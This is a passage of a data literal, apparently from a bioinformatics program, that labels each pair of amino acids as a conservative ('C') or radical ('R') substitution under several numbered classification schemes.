"P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"},3:{("R","H"):"C",("R","K"):"C",("R","D"):"R",("R","E"):"R",("R","A"):"R",("R","N"):"R",("R","C"):"R",("R","Q"):"R",("R","G"):"R",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"R",("R","P"):"R",("R","S"):"R",("R","T"):"R",("R","W"):"R",("R","Y"):"R",("R","V"):"R",("H","K"):"C",("H","D"):"R",("H","E"):"R",("H","A"):"R",("H","N"):"R",("H","C"):"R",("H","Q"):"R",("H","G"):"R",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"R",("H","P"):"R",("H","S"):"R",("H","T"):"R",("H","W"):"R",("H","Y"):"R",("H","V"):"R",("K","D"):"R",("K","E"):"R",("K","A"):"R",("K","N"):"R",("K","C"):"R",("K","Q"):"R",("K","G"):"R",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"R",("K","P"):"R",("K","S"):"R",("K","T"):"R",("K","W"):"R",("K","Y"):"R",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"C",("D","C"):"R",("D","Q"):"C",("D","G"):"R",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"R",("D","T"):"R",("D","W"):"R",("D","Y"):"R",("D","V"):"R",("E","A"):"R",("E","N"):"C",("E","C"):"R",("E","Q"):"C",("E","G"):"R",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"R",("E","T"):"R",("E","W"):"R",("E","Y"):"R",("E","V"):"R",("A","N"):"R",("A","C"):"R",("A","Q"):"R",("A","G"):"C",("A","I"):"R",("A","L"):"R",("A","M"):"R",("A","F"):"R",("A","P"):"C",("A","S"):"C",("A","T"):"C",("A","W"):"R",("A","Y"):"R",("A","V"):"R",("N","C"):"R",("N","Q"):"C",("N","G"):"R",("N","I"):"R",("N","L"):"R",("N","M"):"R",("N","F"):"R",("N","P"):"R",("N","S"):"R",("N","T"):"R",("N","W"):"R",("N","Y"):"R",("N","V"):"R",("C","Q"):"R",("C","G"):"R",("C","I"):"R",("C","L"):"R",("C","M"):"R",("C","F"):"R",("C","P"):"R",("C","S"):"R",("C","T"):"R",("C","W"):"R",("C","Y"):"R",("C","V"):"R",("Q","G"):"R",("Q","I"):"R",("Q","L"):"R",("Q","M"):"R",("Q","F"):"R",("Q","P"):"R",("Q","S"):"R",("Q","T"):"R",("Q","W"):"R",("Q","Y"):"R",("Q","V"):"R",("G","I"):"R",("G","L"):"R",("G","M"):"R",("G","F"):"R",("G","P"):"C",("G","S"):"C",("G","T"):"C",("G","W"):"R",("G","Y"):"R",("G","V"):"R",("I","L"):"C",("I","M"):"C",("I","F"):"R",("I","P"):"R",("I","S"):"R",("I","T"):"R",("I","W"):"R",("I","Y"):"R",("I","V"):"C",("L","M"):"C",("L","F"):"R",("L","P"):"R",("L","S"):"R",("L","T"):"R",("L","W"):"R",("L","Y"):"R",("L","V"):"C",("M","F"):"R",("M","P"):"R",("M","S"):"R",("M","T"):"R",("M","W"):"R",("M","Y"):"R",("M","V"):"C",("F","P"):"R",("F","S"):"C",("F","T"):"C",("F","W"):"R",("F","Y"):"R",("F","V"):"R",("P","S"):"C",("P","T"):"C",("P","W"):"R",("P","Y"):"R",("P","V"):"R",("S","T"):"C",("S","W"):"R",("S","Y"):"R",("S","V"):"R",("T","W"):"R",("T","Y"):"R",("T","V"):"R",("W","Y"):"C",("W","V"):"R",("Y","V"):"R",("H","R"):"C",("K","R"):"C",("D","R"):"R",("E","R"):"R",("A","R"):"R",("N","R"):"R",("C","R"):"R",("Q","R"):"R",("G","R"):"R",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"R",("P","R"):"R",("S","R"):"R",("T","R"):"R",("W","R"):"R",("Y","R"):"R",("V","R"):"R",("K","H"):"C",("D","H"):"R",("E","H"):"R",("A","H"):"R",("N","H"):"R",("C","H"):"R",("Q","H"):"R",("G","H"):"R",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"R",("P","H"):"R",("S","H"):"R",("T","H"):"R",("W","H"):"R",("Y","H"):"R",("V","H"):"R",("D","K"):"R",("E","K"):"R",("A","K"):"R",("N","K"):"R",("C","K"):"R",("Q","K"):"R",("G","K"):"R",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"R",("P","K"):"R",("S","K"):"R",("T","K"):"R",("W","K"):"R",("Y","K"):"R",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"C",("C","D"):"R",("Q","D"):"C",("G","D"):"R",("I","D"):"R",("L","D"):"R",("M","D"):"R",("F","D"):"R",("P","D"):"R",("S","D"):"R",("T","D"):"R",("W","D"):"R",("Y","D"):"R",("V","D"):"R",("A","E"):"R",("N","E"):"C",("C","E"):"R",("Q","E"):"C",("G","E"):"R",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"R",("T","E"):"R",("W","E"):"R",("Y","E"):"R",("V","E"):"R",("N","A"):"R",("C","A"):"R",("Q","A"):"R",("G","A"):"C",("I","A"):"R",("L","A"):"R",("M","A"):"R",("F","A"):"R",("P","A"):"C",("S","A"):"C",("T","A"):"C",("W","A"):"R",("Y","A"):"R",("V","A"):"R",("C","N"):"R",("Q","N"):"C",("G","N"):"R",("I","N"):"R",("L","N"):"R",("M","N"):"R",("F","N"):"R",("P","N"):"R",("S","N"):"R",("T","N"):"R",("W","N"):"R",("Y","N"):"R",("V","N"):"R",("Q","C"):"R",("G","C"):"R",("I","C"):"R",("L","C"):"R",("M","C"):"R",("F","C"):"R",("P","C"):"R",("S","C"):"R",("T","C"):"R",("W","C"):"R",("Y","C"):"R",("V","C"):"R",("G","Q"):"R",("I","Q"):"R",("L","Q"):"R",("M","Q"):"R",("F","Q"):"R",("P","Q"):"R",("S","Q"):"R",("T","Q"):"R",("W","Q"):"R",("Y","Q"):"R",("V","Q"):"R",("I","G"):"R",("L","G"):"R",("M","G"):"R",("F","G"):"R",("P","G"):"C",("S","G"):"C",("T","G"):"C",("W","G"):"R",("Y","G"):"R",("V","G"):"R",("L","I"):"C",("M","I"):"C",("F","I"):"R",("P","I"):"R",("S","I"):"R",("T","I"):"R",("W","I"):"R",("Y","I"):"R",("V","I"):"C",("M","L"):"C",("F","L"):"R",("P","L"):"R",("S","L"):"R",("T","L"):"R",("W","L"):"R",("Y","L"):"R",("V","L"):"C",("F","M"):"R",("P","M"):"R",("S","M"):"R",("T","M"):"R",("W","M"):"R",("Y","M"):"R",("V","M"):"C",("P","F"):"R",("S","F"):"C",("T","F"):"C",("W","F"):"R",("Y","F"):"R",("V","F"):"R",("S","P"):"C",("T","P"):"C",("W","P"):"R",("Y","P"):"R",("V","P"):"R",("T","S"):"C",("W","S"):"R",("Y","S"):"R",("V","S"):"R",("W","T"):"R",("Y","T"):"R",("V","T"):"R",("Y","W"):"C",("V","W"):"R",("V","Y"):"R",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"},4:{("R","H"):"C",("R","K"):"C",("R","D"):"R",("R","E"):"R",("R","A"):"R",("R","N"):"R",("R","C"):"R",("R","Q"):"C",("R","G"):"R",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"C",("R","P"):"R",("R","S"):"R",("R","T"):"R",("R","W"):"C",("R","Y"):"C",("R","V"):"R",("H","K"):"C",("H","D"):"R",("H","E"):"R",("H","A"):"R",("H","N"):"R",("H","C"):"R",("H","Q"):"C",("H","G"):"R",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"C",("H","P"):"R",("H","S"):"R",("H","T"):"R",("H","W"):"C",("H","Y"):"C",("H","V"):"R",("K","D"):"R",("K","E"):"R",("K","A"):"R",("K","N"):"R",("K","C"):"R",("K","Q"):"C",("K","G"):"R",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"C",("K","P"):"R",("K","S"):"R",("K","T"):"R",("K","W"):"C",("K","Y"):"C",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"R",("D","C"):"R",("D","Q"):"R",("D","G"):"R",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"R",("D","T"):"R",("D","W"):"R",("D","Y"):"R",("D","V"):"R",("E","A"):"R",("E","N"):"R",("E","C"):"R",("E","Q"):"R",("E","G"):"R",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"R",("E","T"):"R",("E","W"):"R",("E","Y"):"R",("E","V"):"R",("A","N"):"C",("A","C"):"C",("A","Q"):"R",("A","G"):"C",("A","I"):"R",("A","L"):"R",("A","M"):"R",("A","F"):"R",("A","P"):"C",("A","S"):"C",("A","T"):"C",("A","W"):"R",("A","Y"):"R",("A","V"):"R",("N","C"):"C",("N","Q"):"R",("N","G"):"C",("N","I"):"R",("N","L"):"R",("N","M"):"R",("N","F"):"R",("N","P"):"C",("N","S"):"C",("N","T"):"C",("N","W"):"R",("N","Y"):"R",("N","V"):"R",("C","Q"):"R",("C","G"):"C",("C","I"):"R",("C","L"):"R",("C","M"):"R",("C","F"):"R",("C","P"):"C",("C","S"):"C",("C","T"):"C",("C","W"):"R",("C","Y"):"R",("C","V"):"R",("Q","G"):"R",("Q","I"):"R",("Q","L"):"R",("Q","M"):"R",("Q","F"):"C",("Q","P"):"R",("Q","S"):"R",("Q","T"):"R",("Q","W"):"C",("Q","Y"):"C",("Q","V"):"R",("G","I"):"R",("G","L"):"R",("G","M"):"R",("G","F"):"R",("G","P"):"C",("G","S"):"C",("G","T"):"C",("G","W"):"R",("G","Y"):"R",("G","V"):"R",("I","L"):"C",("I","M"):"C",("I","F"):"R",("I","P"):"R",("I","S"):"R",("I","T"):"R",("I","W"):"R",("I","Y"):"R",("I","V"):"C",("L","M"):"C",("L","F"):"R",("L","P"):"R",("L","S"):"R",("L","T"):"R",("L","W"):"R",("L","Y"):"R",("L","V"):"C",("M","F"):"R",("M","P"):"R",("M","S"):"R",("M","T"):"R",("M","W"):"R",("M","Y"):"R",("M","V"):"C",("F","P"):"R",("F","S"):"R",("F","T"):"R",("F","W"):"C",("F","Y"):"C",("F","V"):"R",("P","S"):"C",("P","T"):"C",("P","W"):"R",("P","Y"):"R",("P","V"):"R",("S","T"):"C",("S","W"):"R",("S","Y"):"R",("S","V"):"R",("T","W"):"R",("T","Y"):"R",("T","V"):"R",("W","Y"):"C",("W","V"):"R",("Y","V"):"R",("H","R"):"C",("K","R"):"C",("D","R"):"R",("E","R"):"R",("A","R"):"R",("N","R"):"R",("C","R"):"R",("Q","R"):"C",("G","R"):"R",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"C",("P","R"):"R",("S","R"):"R",("T","R"):"R",("W","R"):"C",("Y","R"):"C",("V","R"):"R",("K","H"):"C",("D","H"):"R",("E","H"):"R",("A","H"):"R",("N","H"):"R",("C","H"):"R",("Q","H"):"C",("G","H"):"R",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"C",("P","H"):"R",("S","H"):"R",("T","H"):"R",("W","H"):"C",("Y","H"):"C",("V","H"):"R",("D","K"):"R",("E","K"):"R",("A","K"):"R",("N","K"):"R",("C","K"):"R",("Q","K"):"C",("G","K"):"R",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"C",("P","K"):"R",("S","K"):"R",("T","K"):"R",("W","K"):"C",("Y","K"):"C",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"R",("C","D"):"R",("Q","D"):"R",("G","D"):"R",("I","D"):"R",("L","D"):"R",("M","D"):"R",("F","D"):"R",("P","D"):"R",("S","D"):"R",("T","D"):"R",("W","D"):"R",("Y","D"):"R",("V","D"):"R",("A","E"):"R",("N","E"):"R",("C","E"):"R",("Q","E"):"R",("G","E"):"R",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"R",("T","E"):"R",("W","E"):"R",("Y","E"):"R",("V","E"):"R",("N","A"):"C",("C","A"):"C",("Q","A"):"R",("G","A"):"C",("I","A"):"R",("L","A"):"R",("M","A"):"R",("F","A"):"R",("P","A"):"C",("S","A"):"C",("T","A"):"C",("W","A"):"R",("Y","A"):"R",("V","A"):"R",("C","N"):"C",("Q","N"):"R",("G","N"):"C",("I","N"):"R",("L","N"):"R",("M","N"):"R",("F","N"):"R",("P","N"):"C",("S","N"):"C",("T","N"):"C",("W","N"):"R",("Y","N"):"R",("V","N"):"R",("Q","C"):"R",("G","C"):"C",("I","C"):"R",("L","C"):"R",("M","C"):"R",("F","C"):"R",("P","C"):"C",("S","C"):"C",("T","C"):"C",("W","C"):"R",("Y","C"):"R",("V","C"):"R",("G","Q"):"R",("I","Q"):"R",("L","Q"):"R",("M","Q"):"R",("F","Q"):"C",("P","Q"):"R",("S","Q"):"R",("T","Q"):"R",("W","Q"):"C",("Y","Q"):"C",("V","Q"):"R",("I","G"):"R",("L","G"):"R",("M","G"):"R",("F","G"):"R",("P","G"):"C",("S","G"):"C",("T","G"):"C",("W","G"):"R",("Y","G"):"R",("V","G"):"R",("L","I"):"C",("M","I"):"C",("F","I"):"R",("P","I"):"R",("S","I"):"R",("T","I"):"R",("W","I"):"R",("Y","I"):"R",("V","I"):"C",("M","L"):"C",("F","L"):"R",("P","L"):"R",("S","L"):"R",("T","L"):"R",("W","L"):"R",("Y","L"):"R",("V","L"):"C",("F","M"):"R",("P","M"):"R",("S","M"):"R",("T","M"):"R",("W","M"):"R",("Y","M"):"R",("V","M"):"C",("P","F"):"R",("S","F"):"R",("T","F"):"R",("W","F"):"C",("Y","F"):"C",("V","F"):"R",("S","P"):"C",("T","P"):"C",("W","P"):"R",("Y","P"):"R",("V","P"):"R",("T","S"):"C",("W","S"):"R",("Y","S"):"R",("V","S"):"R",("W","T"):"R",("Y","T"):"R",("V","T"):"R",("Y","W"):"C",("V","W"):"R",("V","Y"):"R",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"},5:{("R","H"):"C",("R","K"):"C",("R","D"):"R",("R","E"):"R",("R","A"):"R",("R","N"):"R",("R","C"):"R",("R","Q"):"R",("R","G"):"R",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"R",("R","P"):"R",("R","S"):"R",("R","T"):"R",("R","W"):"R",("R","Y"):"R",("R","V"):"R",("H","K"):"C",("H","D"):"R",("H","E"):"R",("H","A"):"R",("H","N"):"R",("H","C"):"R",("H","Q"):"R",("H","G"):"R",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"R",("H","P"):"R",("H","S"):"R",("H","T"):"R",("H","W"):"R",("H","Y"):"R",("H","V"):"R",("K","D"):"R",("K","E"):"R",("K","A"):"R",("K","N"):"R",("K","C"):"R",("K","Q"):"R",("K","G"):"R",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"R",("K","P"):"R",("K","S"):"R",("K","T"):"R",("K","W"):"R",("K","Y"):"R",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"R",("D","C"):"R",("D","Q"):"R",("D","G"):"R",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"R",("D","T"):"R",("D","W"):"R",("D","Y"):"R",("D","V"):"R",("E","A"):"R",("E","N"):"R",("E","C"):"R",("E","Q"):"R",("E","G"):"R",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"R",("E","T"):"R",("E","W"):"R",("E","Y"):"R",("E","V"):"R",("A","N"):"C",("A","C"):"C",("A","Q"):"C",("A","G"):"C",("A","I"):"C",("A","L"):"C",("A","M"):"C",("A","F"):"R",("A","P"):"C",("A","S"):"C",("A","T"):"C",("A","W"):"R",("A","Y"):"R",("A","V"):"C",("N","C"):"C",("N","Q"):"C",("N","G"):"C",("N","I"):"C",("N","L"):"C",("N","M"):"C",("N","F"):"R",("N","P"):"C",("N","S"):"C",("N","T"):"C",("N","W"):"R",("N","Y"):"R",("N","V"):"C",("C","Q"):"C",("C","G"):"C",("C","I"):"C",("C","L"):"C",("C","M"):"C",("C","F"):"R",("C","P"):"C",("C","S"):"C",("C","T"):"C",("C","W"):"R",("C","Y"):"R",("C","V"):"C",("Q","G"):"C",("Q","I"):"C",("Q","L"):"C",("Q","M"):"C",("Q","F"):"R",("Q","P"):"C",("Q","S"):"C",("Q","T"):"C",("Q","W"):"R",("Q","Y"):"R",("Q","V"):"C",("G","I"):"C",("G","L"):"C",("G","M"):"C",("G","F"):"R",("G","P"):"C",("G","S"):"C",("G","T"):"C",("G","W"):"R",("G","Y"):"R",("G","V"):"C",("I","L"):"C",("I","M"):"C",("I","F"):"R",("I","P"):"C",("I","S"):"C",("I","T"):"C",("I","W"):"R",("I","Y"):"R",("I","V"):"C",("L","M"):"C",("L","F"):"R",("L","P"):"C",("L","S"):"C",("L","T"):"C",("L","W"):"R",("L","Y"):"R",("L","V"):"C",("M","F"):"R",("M","P"):"C",("M","S"):"C",("M","T"):"C",("M","W"):"R",("M","Y"):"R",("M","V"):"C",("F","P"):"R",("F","S"):"R",("F","T"):"R",("F","W"):"C",("F","Y"):"C",("F","V"):"R",("P","S"):"C",("P","T"):"C",("P","W"):"R",("P","Y"):"R",("P","V"):"C",("S","T"):"C",("S","W"):"R",("S","Y"):"R",("S","V"):"R",("T","W"):"R",("T","Y"):"R",("T","V"):"C",("W","Y"):"C",("W","V"):"R",("Y","V"):"R",("H","R"):"C",("K","R"):"C",("D","R"):"R",("E","R"):"R",("A","R"):"R",("N","R"):"R",("C","R"):"R",("Q","R"):"R",("G","R"):"R",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"R",("P","R"):"R",("S","R"):"R",("T","R"):"R",("W","R"):"R",("Y","R"):"R",("V","R"):"R",("K","H"):"C",("D","H"):"R",("E","H"):"R",("A","H"):"R",("N","H"):"R",("C","H"):"R",("Q","H"):"R",("G","H"):"R",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"R",("P","H"):"R",("S","H"):"R",("T","H"):"R",("W","H"):"R",("Y","H"):"R",("V","H"):"R",("D","K"):"R",("E","K"):"R",("A","K"):"R",("N","K"):"R",("C","K"):"R",("Q","K"):"R",("G","K"):"R",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"R",("P","K"):"R",("S","K"):"R",("T","K"):"R",("W","K"):"R",("Y","K"):"R",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"R",("C","D"):"R",("Q","D"):"R",("G","D"):"R",("I","D"):"R",("L","D"):"R",("M","D"):"R",("F","D"):"R",("P","D"):"R",("S","D"):"R",("T","D"):"R",("W","D"):"R",("Y","D"):"R",("V","D"):"R",("A","E"):"R",("N","E"):"R",("C","E"):"R",("Q","E"):"R",("G","E"):"R",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"R",("T","E"):"R",("W","E"):"R",("Y","E"):"R",("V","E"):"R",("N","A"):"C",("C","A"):"C",("Q","A"):"C",("G","A"):"C",("I","A"):"C",("L","A"):"C",("M","A"):"C",("F","A"):"R",("P","A"):"C",("S","A"):"C",("T","A"):"C",("W","A"):"R",("Y","A"):"R",("V","A"):"C",("C","N"):"C",("Q","N"):"C",("G","N"):"C",("I","N"):"C",("L","N"):"C",("M","N"):"C",("F","N"):"R",("P","N"):"C",("S","N"):"C",("T","N"):"C",("W","N"):"R",("Y","N"):"R",("V","N"):"C",("Q","C"):"C",("G","C"):"C",("I","C"):"C",("L","C"):"C",("M","C"):"C",("F","C"):"R",("P","C"):"C",("S","C"):"C",("T","C"):"C",("W","C"):"R",("Y","C"):"R",("V","C"):"C",("G","Q"):"C",("I","Q"):"C",("L","Q"):"C",("M","Q"):"C",("F","Q"):"R",("P","Q"):"C",("S","Q"):"C",("T","Q"):"C",("W","Q"):"R",("Y","Q"):"R",("V","Q"):"C",("I","G"):"C",("L","G"):"C",("M","G"):"C",("F","G"):"R",("P","G"):"C",("S","G"):"C",("T","G"):"C",("W","G"):"R",("Y","G"):"R",("V","G"):"C",("L","I"):"C",("M","I"):"C",("F","I"):"R",("P","I"):"C",("S","I"):"C",("T","I"):"C",("W","I"):"R",("Y","I"):"R",("V","I"):"C",("M","L"):"C",("F","L"):"R",("P","L"):"C",("S","L"):"C",("T","L"):"C",("W","L"):"R",("Y","L"):"R",("V","L"):"C",("F","M"):"R",("P","M"):"C",("S","M"):"C",("T","M"):"C",("W","M"):"R",("Y","M"):"R",("V","M"):"C",("P","F"):"R",("S","F"):"R",("T","F"):"R",("W","F"):"C",("Y","F"):"C",("V","F"):"R",("S","P"):"C",("T","P"):"C",("W","P"):"R",("Y","P"):"R",("V","P"):"C",("T","S"):"C",("W","S"):"R",("Y","S"):"R",("V","S"):"R",("W","T"):"R",("Y","T"):"R",("V","T"):"C",("Y","W"):"C",("V","W"):"R",("V","Y"):"R",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"},6:{("R","H"):"C",("R","K"):"C",("R","D"):"R",("R","E"):"R",("R","A"):"R",("R","N"):"R",("R","C"):"R",("R","Q"):"R",("R","G"):"R",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"R",("R","P"):"R",("R","S"):"R",("R","T"):"R",("R","W"):"R",("R","Y"):"R",("R","V"):"R",("H","K"):"C",("H","D"):"R",("H","E"):"R",("H","A"):"R",("H","N"):"R",("H","C"):"R",("H","Q"):"R",("H","G"):"R",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"R",("H","P"):"R",("H","S"):"R",("H","T"):"R",("H","W"):"R",("H","Y"):"R",("H","V"):"R",("K","D"):"R",("K","E"):"R",("K","A"):"R",("K","N"):"R",("K","C"):"R",("K","Q"):"R",("K","G"):"R",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"R",("K","P"):"R",("K","S"):"R",("K","T"):"R",("K","W"):"R",("K","Y"):"R",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"R",("D","C"):"R",("D","Q"):"R",("D","G"):"R",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"R",("D","T"):"R",("D","W"):"R",("D","Y"):"R",("D","V"):"R",("E","A"):"R",("E","N"):"R",("E","C"):"R",("E","Q"):"R",("E","G"):"R",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"R",("E","T"):"R",("E","W"):"R",("E","Y"):"R",("E","V"):"R",("A","N"):"R",("A","C"):"R",("A","Q"):"R",("A","G"):"C",("A","I"):"C",("A","L"):"C",("A","M"):"C",("A","F"):"C",("A","P"):"C",("A","S"):"R",("A","T"):"R",("A","W"):"C",("A","Y"):"R",("A","V"):"C",("N","C"):"C",("N","Q"):"C",("N","G"):"R",("N","I"):"R",("N","L"):"R",("N","M"):"R",("N","F"):"R",("N","P"):"R",("N","S"):"C",("N","T"):"C",("N","W"):"R",("N","Y"):"C",("N","V"):"R",("C","Q"):"C",("C","G"):"R",("C","I"):"R",("C","L"):"R",("C","M"):"R",("C","F"):"R",("C","P"):"R",("C","S"):"C",("C","T"):"C",("C","W"):"R",("C","Y"):"C",("C","V"):"R",("Q","G"):"R",("Q","I"):"R",("Q","L"):"R",("Q","M"):"R",("Q","F"):"R",("Q","P"):"R",("Q","S"):"C",("Q","T"):"C",("Q","W"):"R",("Q","Y"):"C",("Q","V"):"R",("G","I"):"C",("G","L"):"C",("G","M"):"C",("G","F"):"C",("G","P"):"C",("G","S"):"R",("G","T"):"R",("G","W"):"C",("G","Y"):"R",("G","V"):"C",("I","L"):"C",("I","M"):"C",("I","F"):"C",("I","P"):"C",("I","S"):"R",("I","T"):"R",("I","W"):"C",("I","Y"):"R",("I","V"):"C",("L","M"):"C",("L","F"):"C",("L","P"):"C",("L","S"):"R",("L","T"):"R",("L","W"):"C",("L","Y"):"R",("L","V"):"C",("M","F"):"C",("M","P"):"C",("M","S"):"R",("M","T"):"R",("M","W"):"C",("M","Y"):"R",("M","V"):"C",("F","P"):"C",("F","S"):"R",("F","T"):"R",("F","W"):"C",("F","Y"):"R",("F","V"):"C",("P","S"):"R",("P","T"):"R",("P","W"):"C",("P","Y"):"R",("P","V"):"C",("S","T"):"C",("S","W"):"R",("S","Y"):"C",("S","V"):"R",("T","W"):"R",("T","Y"):"C",("T","V"):"R",("W","Y"):"R",("W","V"):"C",("Y","V"):"R",("H","R"):"C",("K","R"):"C",("D","R"):"R",("E","R"):"R",("A","R"):"R",("N","R"):"R",("C","R"):"R",("Q","R"):"R",("G","R"):"R",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"R",("P","R"):"R",("S","R"):"R",("T","R"):"R",("W","R"):"R",("Y","R"):"R",("V","R"):"R",("K","H"):"C",("D","H"):"R",("E","H"):"R",("A","H"):"R",("N","H"):"R",("C","H"):"R",("Q","H"):"R",("G","H"):"R",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"R",("P","H"):"R",("S","H"):"R",("T","H"):"R",("W","H"):"R",("Y","H"):"R",("V","H"):"R",("D","K"):"R",("E","K"):"R",("A","K"):"R",("N","K"):"R",("C","K"):"R",("Q","K"):"R",("G","K"):"R",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"R",("P","K"):"R",("S","K"):"R",("T","K"):"R",("W","K"):"R",("Y","K"):"R",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"R",("C","D"):"R",("Q","D"):"R",("G","D"):"R",("I","D"):"R",("L","D"):"R",("M","D"):"R",("F","D"):"R",("P","D"):"R",("S","D"):"R",("T","D"):"R",("W","D"):"R",("Y","D"):"R",("V","D"):"R",("A","E"):"R",("N","E"):"R",("C","E"):"R",("Q","E"):"R",("G","E"):"R",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"R",("T","E"):"R",("W","E"):"R",("Y","E"):"R",("V","E"):"R",("N","A"):"R",("C","A"):"R",("Q","A"):"R",("G","A"):"C",("I","A"):"C",("L","A"):"C",("M","A"):"C",("F","A"):"C",("P","A"):"C",("S","A"):"R",("T","A"):"R",("W","A"):"C",("Y","A"):"R",("V","A"):"C",("C","N"):"C",("Q","N"):"C",("G","N"):"R",("I","N"):"R",("L","N"):"R",("M","N"):"R",("F","N"):"R",("P","N"):"R",("S","N"):"C",("T","N"):"C",("W","N"):"R",("Y","N"):"C",("V","N"):"R",("Q","C"):"C",("G","C"):"R",("I","C"):"R",("L","C"):"R",("M","C"):"R",("F","C"):"R",("P","C"):"R",("S","C"):"C",("T","C"):"C",("W","C"):"R",("Y","C"):"C",("V","C"):"R",("G","Q"):"R",("I","Q"):"R",("L","Q"):"R",("M","Q"):"R",("F","Q"):"R",("P","Q"):"R",("S","Q"):"C",("T","Q"):"C",("W","Q"):"R",("Y","Q"):"C",("V","Q"):"R",("I","G"):"C",("L","G"):"C",("M","G"):"C",("F","G"):"C",("P","G"):"C",("S","G"):"R",("T","G"):"R",("W","G"):"C",("Y","G"):"R",("V","G"):"C",("L","I"):"C",("M","I"):"C",("F","I"):"C",("P","I"):"C",("S","I"):"R",("T","I"):"R",("W","I"):"C",("Y","I"):"R",("V","I"):"C",("M",